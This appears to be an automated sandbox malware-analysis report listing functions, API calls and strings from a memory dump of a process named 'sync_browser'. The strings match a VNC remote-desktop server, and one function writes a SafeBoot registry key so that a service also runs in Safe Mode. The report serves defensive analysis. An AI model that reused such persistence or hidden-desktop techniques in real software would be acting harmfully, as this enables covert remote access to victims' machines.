vncdesktop.cpp : failed to build DIB section - reverting to slow blits, xrefs: 00007FF7D596082A
vncdesktop.cpp : attempting to enable DIBsection blits, xrefs: 00007FF7D59607D7
vncdesktop.cpp : enabled fast DIBsection blits OK, xrefs: 00007FF7D5960897
vncdesktop.cpp : failed to create memory bitmap(%d), xrefs: 00007FF7D5960865
vncdesktop.cpp : enabled slow blits OK, xrefs: 00007FF7D5960882

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Create$BitmapCompatibleDeleteErrorLastObjectSection
String ID: vncdesktop.cpp : attempting to enable DIBsection blits$vncdesktop.cpp : enabled fast DIBsection blits OK$vncdesktop.cpp : enabled slow blits OK$vncdesktop.cpp : failed to build DIB section - reverting to slow blits$vncdesktop.cpp : failed to create memory bitmap(%d)
API String ID: 554953491-3667255696
Opcode ID: 2412a222e5f925d2ec09e0f324b69aa0f7fbd9fb7eb1a0c9a7fdb40c2cf1af0a
Instruction ID: 398ef49a456a82d24992d8136198356efe3997d06d9f22551e115a89c84f8bfa
Opcode Fuzzy Hash: 2412a222e5f925d2ec09e0f324b69aa0f7fbd9fb7eb1a0c9a7fdb40c2cf1af0a
Instruction Fuzzy Hash: CF311625608A9686EB04EF64E4408ADBB60FF88F98FC84533DE4D47658DF3CE105C3A0

Function 00007FF7D5943110 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 48registryCOMMON

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 00007FF7D5943155

Part of subcall function 00007FF7D59E851C: _errno.LIBCMT ref: 00007FF7D59E8553
Part of subcall function 00007FF7D59E851C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E855E

RegCreateKeyExA.ADVAPI32 ref: 00007FF7D5943199
RegSetValueExA.ADVAPI32 ref: 00007FF7D59431C7
RegCloseKey.ADVAPI32 ref: 00007FF7D59431D2

Strings

?, xrefs: 00007FF7D5943189
SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s, xrefs: 00007FF7D5943137
uvnc_service, xrefs: 00007FF7D5943129
Network, xrefs: 00007FF7D5943130
Service, xrefs: 00007FF7D59431A8

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseCreateValue_errno_invalid_parameter_noinfo_snprintf
String ID: ?$Network$SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s$Service$uvnc_service
API String ID: 913464532-2910635102
Opcode ID: 1bf795a48dcafc41ba0ceb8bae0d18797e802051582379eab5386516ec84cd5c
Instruction ID: e871204b2416fc0759f74cf03df9e40785b9cd6a4ae4bf9db6917efff6ca1eb9
Opcode Fuzzy Hash: 1bf795a48dcafc41ba0ceb8bae0d18797e802051582379eab5386516ec84cd5c
Instruction Fuzzy Hash: C2217171A18A8282EB60EB10F455B6EBBA0FBC5758FC00136EA8C07B68DF7DD105CB14

Function 00007FF7D59F59D8 Relevance: 15.2, APIs: 10, Instructions: 206COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7D59F5D15), ref: 00007FF7D59F5A72
malloc.LIBCMT ref: 00007FF7D59F5ADB
MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7D59F5D15), ref: 00007FF7D59F5B0F
LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7D59F5D15), ref: 00007FF7D59F5B36
LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7D59F5D15), ref: 00007FF7D59F5B7E
malloc.LIBCMT ref: 00007FF7D59F5BDB

Part of subcall function 00007FF7D59E8C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7D59E8C64
Part of subcall function 00007FF7D59E8C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7D59F329C,?,?,?,00007FF7D59F7749,?,?,?,00007FF7D59F77F3), ref: 00007FF7D59E8C89
Part of subcall function 00007FF7D59E8C34: _callnewh.LIBCMT ref: 00007FF7D59E8CA2
Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CAD
Part of subcall function 00007FF7D59E8C34: _errno.LIBCMT ref: 00007FF7D59E8CB8

LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7D59F5D15), ref: 00007FF7D59F5C10
WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF7D59F5D15), ref: 00007FF7D59F5C50
free.LIBCMT ref: 00007FF7D59F5C64
free.LIBCMT ref: 00007FF7D59F5C75

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
String ID:
API String ID: 1080698880-0
Opcode ID: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
Instruction ID: c6a359ac6bac90bcaddda1a854330d01bef9db71262ff3a07de221e982c0db3c
Opcode Fuzzy Hash: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
Instruction Fuzzy Hash: AD819D32A0D78287EB24AF65988016DA6D5FB49FACFD44236EE2D43BD4DF38D5018720

Function 00007FF7D59569D5 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 224COMMON

Download Yara Rule

APIs

OpenInputDesktop.USER32 ref: 00007FF7D595407F
CloseDesktop.USER32 ref: 00007FF7D59540C2
GetTickCount.KERNEL32 ref: 00007FF7D59541B3

Part of subcall function 00007FF7D595C4E0: timeGetTime.WINMM ref: 00007FF7D595C52A
Part of subcall function 00007FF7D595C4E0: EnterCriticalSection.KERNEL32 ref: 00007FF7D595C551
Part of subcall function 00007FF7D595C4E0: RevertToSelf.ADVAPI32 ref: 00007FF7D595C56C
Part of subcall function 00007FF7D595C4E0: LeaveCriticalSection.KERNEL32 ref: 00007FF7D595C57C

LeaveCriticalSection.KERNEL32 ref: 00007FF7D5957BAC

Strings

vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF7D5954060
vncclient.cpp : vncClientThread , xrefs: 00007FF7D5954029
vncservice.cpp : SelectDesktop , xrefs: 00007FF7D595404B
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF7D595409A

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$DesktopLeave$CloseCountEnterInputOpenRevertSelfTickTimetime
String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 2523754900-3977938048
Opcode ID: 9a7525795177f4a570cef7dccf6c73ea45f8d1ba20e1ddabafe20dcd5e05a56b
Instruction ID: 674a5c72bd457f18e55331fdfc08b25b8fd3834bb2601578750d4709e8cba0ee
Opcode Fuzzy Hash: 9a7525795177f4a570cef7dccf6c73ea45f8d1ba20e1ddabafe20dcd5e05a56b
Instruction Fuzzy Hash: E5B1D122A0869186F794EB25C4587FEABA1EB85F88FD84032DE4C477A5CF3CD455C720

Function 00007FF7D593B8C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110networkCOMMON

Download Yara Rule

APIs

inet_addr.WS2_32 ref: 00007FF7D593B931
inet_addr.WS2_32 ref: 00007FF7D593B9C2
gethostbyname.WS2_32 ref: 00007FF7D593B9CE
htons.WS2_32 ref: 00007FF7D593B9FE
socket.WS2_32 ref: 00007FF7D593BA13
connect.WS2_32 ref: 00007FF7D593BA2A

Strings

0123456789., xrefs: 00007FF7D593B901, 00007FF7D593B992

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: inet_addr$connectgethostbynamehtonssocket
String ID: 0123456789.
API String ID: 478842821-2088042752
Opcode ID: 263abe01daf5a009ada5feb1aef2725500a51be732e0e04e7777c9ecb3499f38
Instruction ID: 4ac5cffd9407ee29169a584909d0298031913a4103ea45d2ba4b7491ff0c1b42
Opcode Fuzzy Hash: 263abe01daf5a009ada5feb1aef2725500a51be732e0e04e7777c9ecb3499f38
Instruction Fuzzy Hash: 17416261619651C6EA24AF26E45007DA7A1FF88F98FC45232EE8D07799EF3CE542C720

Function 00007FF7D5965AE0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 108COMMON

Download Yara Rule

APIs

GetClassNameA.USER32 ref: 00007FF7D5965B63
GetWindowRect.USER32 ref: 00007FF7D5965BA3
CreateRectRgn.GDI32 ref: 00007FF7D5965C46
CombineRgn.GDI32 ref: 00007FF7D5965C5F
DeleteObject.GDI32 ref: 00007FF7D5965C68
free.LIBCMT ref: 00007FF7D5965C71

Strings

ConsoleWindowClass, xrefs: 00007FF7D5965B87
tty, xrefs: 00007FF7D5965B72

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Rect$ClassCombineCreateDeleteNameObjectWindowfree
String ID: ConsoleWindowClass$tty
API String ID: 490048385-1921057836
Opcode ID: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
Instruction ID: 18e4c7771e62e9750178cc5daa1c1c23ae1e9d0f89d72e0bb6e8287faa0ec760
Opcode Fuzzy Hash: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
Instruction Fuzzy Hash: 6C415E367086858BDB249B25E49066DB7A0FB89F94FC44136DE8E53B58DF3CE445CB10

Function 00007FF7D5958ED0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 87COMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 00007FF7D5958F3A
PtInRect.USER32 ref: 00007FF7D5958F4A
EnterCriticalSection.KERNEL32 ref: 00007FF7D5958F79
LeaveCriticalSection.KERNEL32 ref: 00007FF7D5958F8C
GetCursorPos.USER32 ref: 00007FF7D5958FB1
EnterCriticalSection.KERNEL32 ref: 00007FF7D5959006
LeaveCriticalSection.KERNEL32 ref: 00007FF7D5959037

Strings

^, xrefs: 00007FF7D5958FFB

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$CursorEnterLeave$Rect
String ID: ^
API String ID: 2550375211-1590793086
Opcode ID: d878f0e7e6db227b12d9c6317699a075fbf28d892376275b9f235674c6b9a16b
Instruction ID: 0fc858e5b3189b60669ed684630f2bc6441c87bea823ec7fbe1e4aea897dc98d
Opcode Fuzzy Hash: d878f0e7e6db227b12d9c6317699a075fbf28d892376275b9f235674c6b9a16b
Instruction Fuzzy Hash: E6410A326186818BD728DF29E59466DB7A0FB88B94F904136EB5D03B54CF3CE465CB10

Function 00007FF7D593A6B0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 82COMMON

Download Yara Rule

APIs

SystemParametersInfoA.USER32 ref: 00007FF7D593A716
GetLastError.KERNEL32 ref: 00007FF7D593A720
SystemParametersInfoA.USER32 ref: 00007FF7D593A794
GetLastError.KERNEL32 ref: 00007FF7D593A79E

Strings

HideDesktop.cpp : Retrieved SPI value for 0x%04x: 0x%08x, xrefs: 00007FF7D593A738
HideDesktop.cpp : Failed to set SPI value for 0x%04x to 0x%08x (0x%08x), xrefs: 00007FF7D593A7AC
HideDesktop.cpp : Failed to get SPI value for 0x%04x (0x%08x), xrefs: 00007FF7D593A726
HideDesktop.cpp : Set SPI value for 0x%04x to 0x%08x, xrefs: 00007FF7D593A7E7

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorInfoLastParametersSystem
String ID: HideDesktop.cpp : Failed to get SPI value for 0x%04x (0x%08x)$HideDesktop.cpp : Failed to set SPI value for 0x%04x to 0x%08x (0x%08x)$HideDesktop.cpp : Retrieved SPI value for 0x%04x: 0x%08x$HideDesktop.cpp : Set SPI value for 0x%04x to 0x%08x
API String ID: 2777246624-2146332292
Opcode ID: 6a035a78c7a656c7d74b77a1e238c7683e8273999f34b1d7744062f167e8fc50
Instruction ID: 92a56d389a0abcae61aad3a3f4313cd3183afd26e563838496878db63fc2f6ac
Opcode Fuzzy Hash: 6a035a78c7a656c7d74b77a1e238c7683e8273999f34b1d7744062f167e8fc50
Instruction Fuzzy Hash: 2F416C31E086928BE714EF64A840A69BB61FB84B88FC40137DD8E57A58DF3DE505C760

Function 00007FF7D5949630 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeA.VERSION ref: 00007FF7D5949655
GetLastError.KERNEL32 ref: 00007FF7D594965D

Strings

Fail: Using 32bit winvnc.exe with a 64bit driver? , xrefs: 00007FF7D5949667
\StringFileInfo\000004b0\ProductVersion, xrefs: 00007FF7D59496D1
\StringFileInfo\040904b0\ProductVersion, xrefs: 00007FF7D59496B3

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorFileInfoLastSizeVersion
String ID: Fail: Using 32bit winvnc.exe with a 64bit driver? $\StringFileInfo\000004b0\ProductVersion$\StringFileInfo\040904b0\ProductVersion
API String ID: 752140088-134519983
Opcode ID: e2740d92ce40838baa9be926f816465ab0ca25b8825aa07bbc0d6af3aaf476b2
Instruction ID: e94b75f60198bf9c9d9dad1870ff6ea5622ae0c99a94c838b2b4976111e65411
Opcode Fuzzy Hash: e2740d92ce40838baa9be926f816465ab0ca25b8825aa07bbc0d6af3aaf476b2
Instruction Fuzzy Hash: DD219161B0965687EA14BB66A8005ADE7A0EF85FD8FC40032EE4D07A19EF7CD586C720

Function 00007FF7D5963523 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58timethreadclipboardCOMMON

Download Yara Rule

APIs

KillTimer.USER32 ref: 00007FF7D596352B
ChangeClipboardChain.USER32 ref: 00007FF7D5963540
GetCurrentThreadId.KERNEL32 ref: 00007FF7D59635B1

Strings

vncdesktopsink.cpp : unset SC hooks OK, xrefs: 00007FF7D5963588
vncdesktopsink.cpp : Unsethooks OK, xrefs: 00007FF7D59635D3
vncdesktopsink.cpp : Unsethooks Failed, xrefs: 00007FF7D59635CA
vncdesktopsink.cpp : WM_DESTROY, xrefs: 00007FF7D59635E5
vncdesktopsink.cpp : unset W8 hooks OK, xrefs: 00007FF7D5963564

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ChainChangeClipboardCurrentKillThreadTimer
String ID: vncdesktopsink.cpp : Unsethooks Failed$vncdesktopsink.cpp : Unsethooks OK$vncdesktopsink.cpp : WM_DESTROY$vncdesktopsink.cpp : unset SC hooks OK$vncdesktopsink.cpp : unset W8 hooks OK
API String ID: 3622578367-539335655
Opcode ID: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
Instruction ID: 1c14647fc6cfd0a3fb1f07d74cfac9f47eb0c9c2f039d3cd4dda2123cacdc6c5
Opcode Fuzzy Hash: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
Instruction Fuzzy Hash: 2A216BA2A185D293F60CBB64E9505BDA7A1FF84B85FC84533CE1E470A0DF3CA064C220

Function 00007FF7D59E9ABC Relevance: 13.6, APIs: 9, Instructions: 142COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00007FF7D59E9AF3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E9AFF
_errno.LIBCMT ref: 00007FF7D59E9B5A
_errno.LIBCMT ref: 00007FF7D59E9B66
_errno.LIBCMT ref: 00007FF7D59E9B9A
malloc.LIBCMT ref: 00007FF7D59E9BFA
_errno.LIBCMT ref: 00007FF7D59E9C1A
_errno.LIBCMT ref: 00007FF7D59E9C76
free.LIBCMT ref: 00007FF7D59E9C8E

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
